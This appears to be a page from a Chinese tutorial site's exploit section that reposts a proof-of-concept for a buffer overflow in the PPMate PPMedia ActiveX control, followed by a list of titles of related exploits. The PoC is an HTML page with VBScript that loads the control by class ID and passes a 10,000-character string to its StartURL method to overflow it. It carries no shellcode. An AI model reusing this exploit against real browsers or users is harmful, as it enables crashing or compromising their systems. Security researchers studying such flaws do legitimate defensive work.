手机
当前位置:查字典教程网 >网络安全 >Exploit >PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
摘要:arg1=String(10000,"A")target.StartURL(arg1)

<html>

<body> <object id=target

classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>

<script language=vbscript> arg1=String(10000, "A")

target.StartURL(arg1) </script>

</body>

</html>

【PPMate PPMedia Class ActiveX Control Buffer Overflow PoC】相关文章:

MS Windows (MessageBox) Memory Corruption Local Denial of Service

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC

精品推荐
分类导航